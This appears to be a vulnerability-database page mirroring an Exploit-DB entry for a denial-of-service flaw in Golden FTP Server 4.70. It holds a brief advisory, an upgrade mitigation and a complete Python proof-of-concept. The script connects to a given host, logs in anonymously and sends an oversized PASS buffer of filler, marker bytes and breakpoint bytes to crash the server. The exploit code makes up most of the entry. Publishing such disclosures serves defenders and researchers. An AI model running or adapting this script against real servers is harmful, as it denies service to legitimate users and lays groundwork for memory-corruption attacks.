Golden FTP Server Denial of Service Vulnerability

vendor:

Golden FTP Server

by:

SecurityFocus

7.8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Golden FTP Server

Affected Version From: 4.7

Affected Version To: 4.7

Patch Exists: YES

Related CWE: N/A

CPE: Golden FTP Server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Golden FTP Server Denial of Service Vulnerability

Golden FTP Server is prone to a denial-of-service vulnerability. Exploits will cause the application to crash, denying service to legitimate users. Golden FTP Server 4.70 is vulnerable; other versions may also be affected.

Mitigation:

Upgrade to the latest version of Golden FTP Server

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/45924/info

Golden FTP Server is prone to a denial-of-service vulnerability.

Exploits will cause the application to crash, denying service to legitimate users.

Golden FTP Server 4.70 is vulnerable; other versions may also be affected. 

import socket
import sys
import time
 
Bs = &#039;\x42&#039; * 4
 
buffer = &#039;\x41&#039; * 533 + Bs + &#039;\xcc&#039; * 300
 
if len(sys.argv) != 3:
        print "Usage: ./goldenftp.py <ip> <port>"
        sys.exit()
  
ip   = sys.argv[1]
port = sys.argv[2]
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:   
    print "[*] Sending evil buffer"
    s.connect((ip,int(port)))
    s.recv(1024)
    time.sleep(2)
    s.send(&#039;USER anonymous&#039;+ &#039;\r\n&#039;)
    s.recv(1024)
    time.sleep(3)  
    s.send(&#039;PASS &#039; + buffer + &#039;\r\n&#039;)
    s.recv(1024)   
    time.sleep(1)
    s.close()
except:
    print "Can&#039;t Connect to Server"
    sys.exit()